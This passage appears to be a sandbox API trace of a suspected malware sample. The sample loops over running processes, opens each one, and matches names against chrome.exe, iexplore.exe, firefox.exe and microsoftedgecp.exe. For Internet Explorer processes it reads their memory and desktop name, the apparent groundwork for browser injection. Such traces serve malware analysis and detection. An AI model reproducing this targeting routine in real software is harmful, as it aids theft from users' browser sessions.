	[0238.276] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x7d68
	[0238.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.276] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0238.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.277] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.278] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0238.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.278] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.279] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0238.280] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x7d6c
	[0238.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.280] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0238.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.281] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.282] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0238.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.283] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.283] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0238.284] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x7d70
	[0238.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.285] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0238.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.285] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.286] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0238.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.287] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.287] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0238.288] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x7d74
	[0238.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.288] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0238.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.289] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0238.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.289] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0238.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.290] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.290] NtQueryInformationProcess (in: ProcessHandle=0x7d74, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0238.290] ReadProcessMemory (in: hProcess=0x7d74, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0238.290] ReadProcessMemory (in: hProcess=0x7d74, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0238.292] ReadProcessMemory (in: hProcess=0x7d74, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0238.293] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0238.293] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0238.294] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x7d78
	[0238.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.294] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0238.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.295] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0238.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.295] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0238.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.295] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.296] NtQueryInformationProcess (in: ProcessHandle=0x7d78, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0238.296] ReadProcessMemory (in: hProcess=0x7d78, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0238.296] ReadProcessMemory (in: hProcess=0x7d78, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0238.296] ReadProcessMemory (in: hProcess=0x7d78, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0238.296] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0238.296] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0238.298] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x7d7c
	[0238.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.298] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0238.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.298] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.299] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0238.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.299] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.300] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0238.301] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x7d80
	[0238.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.301] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0238.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.301] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.302] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0238.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.302] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.303] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.304] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x7d84
	[0238.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.304] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.304] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.305] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.305] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.306] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.308] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.309] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x7d88
	[0238.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.309] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.309] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.310] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.310] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.311] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.312] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x7d8c
	[0238.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.312] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.312] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.313] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.313] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.314] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0238.315] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x7d90
	[0238.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.315] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0238.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.315] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.316] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0238.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.316] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.317] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.318] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x7d94
	[0238.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.318] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.318] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.319] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.319] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.320] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.321] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x7d98
	[0238.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.321] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.321] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.323] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.323] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.324] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0238.325] CloseHandle (hObject=0x4fd0) returned 1
	[0238.325] Sleep (dwMilliseconds=0x64) 
	[0238.431] GetCurrentProcessId () returned 0x110
	[0238.431] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0238.435] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0238.437] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0238.438] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0238.440] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x7d9c
	[0238.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.440] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0238.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.441] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.441] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0238.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.442] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.442] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0238.443] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x7da0
	[0238.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.444] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0238.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.444] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.445] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0238.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.445] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.445] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0238.446] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x7da4
	[0238.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.446] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0238.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.447] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.447] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0238.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.447] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.448] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0238.448] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x7da8
	[0238.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.449] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0238.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.449] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.449] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0238.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.449] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.450] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0238.450] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x7dac
	[0238.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.451] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0238.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.451] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.451] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0238.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.452] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.452] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0238.452] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x7db0
	[0238.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.453] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0238.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.453] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.453] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0238.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.454] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.454] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0238.455] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x7db4
	[0238.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.455] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0238.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.455] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.455] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0238.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.456] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.456] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0238.456] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x7db8
	[0238.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.457] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0238.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.457] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.457] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0238.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.457] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.457] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.458] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x7dbc
	[0238.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.458] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.459] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
